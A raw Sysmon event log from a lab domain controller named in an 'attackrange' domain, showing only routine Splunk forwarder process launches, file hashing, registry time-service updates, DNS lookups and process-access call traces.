13:55:12.663{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=483A9BF058C13BE58AD8BA68F28CE207,SHA256=7CE7B8DB86A24B8ECF0F7200327836E02D653EA82A3B769089E7712239A9654A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200765Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:13.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA4A55C01BAD7E66FDD3F8ED5939C1BB,SHA256=8A7E40A0D920C919C9CD38D320E7F4026AC7C69FBC5792CA0979F0CD7E184A14,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002200764Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002200763Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x09513642) 13241300x80000000000000002200762Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f5-0x9db7ca0c) 13241300x80000000000000002200761Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fd-0xff7c320c) 13241300x80000000000000002200760Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71106-0x61409a0c) 13241300x80000000000000002200759Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000002200758Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x09513642) 13241300x80000000000000002200757Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f5-0x9d8cdb86) 13241300x80000000000000002200756Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fd-0xff514386) 13241300x80000000000000002200755Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:55:13.695{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71106-0x6115ab86) 354300x80000000000000002200754Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.438{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61430- 23542300x80000000000000002200767Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:14.804{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=140EE00344289C1712814F0F530C6D97,SHA256=B5293A5D00536EBAA6A42F330F05878A7667FE47E2AFE86E46778B50CAABE071,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200766Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:10.453{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61430- 23542300x80000000000000002200769Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:15.820{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0475CFD9F817FC8216862E2A815275,SHA256=868604D98A0059FBCD52A7F5BC40478497E6CD530BDDED8D426B724DB87178DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200768Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:15.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7702CEDA4D662584403397883263C130,SHA256=8CEAEA7C1EE6651D688C7D436AD4E24C016A0535CFE0E497357DB1579CD6E55A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200771Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:16.835{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D840D09CF0FEE0CA7689C3B9DB5D6D60,SHA256=72EBA074EC5D6DC39F4BF667D604DE5B0403045E4ADFBB25494FECDE47E03E0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200770Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:12.001{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55154-false10.0.1.12-8000- 23542300x80000000000000002200781Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.851{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FECD5386B462C339D7E63ACA4929F128,SHA256=661C23C2492B0A720C39C77479A85B26E99C6524BD172B89D3CE30A937EEC941,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200780Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.695{5ABCFE62-E6C5-6040-E94D-00000000AD01}26605548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200779Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6C5-6040-E94D-00000000AD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200778Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200777Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200776Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200775Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200774Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E6C5-6040-E94D-00000000AD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200773Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.554{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6C5-6040-E94D-00000000AD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200772Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.555{5ABCFE62-E6C5-6040-E94D-00000000AD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200800Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.945{5ABCFE62-E6C6-6040-EB4D-00000000AD01}38722740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200799Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.851{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA3A583E18DB1204C3E849F4D72F72C,SHA256=F17D2D8948152A4148ED9F846F9A90ED72C79814EE6C7FA1FEE4EFF855CB34FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200798Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6C6-6040-EB4D-00000000AD01}3872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200797Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200796Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200795Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200794Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200793Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E6C6-6040-EB4D-00000000AD01}3872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200792Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6C6-6040-EB4D-00000000AD01}3872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200791Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.820{5ABCFE62-E6C6-6040-EB4D-00000000AD01}3872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200790Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.585{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522D10E259C9C2A765583B783B742B06,SHA256=88EEC5A05404DAD82E9C5DEE32CB190AFB484FADB0AD57C2E81D2A4C062E0162,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200789Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6C6-6040-EA4D-00000000AD01}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200788Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 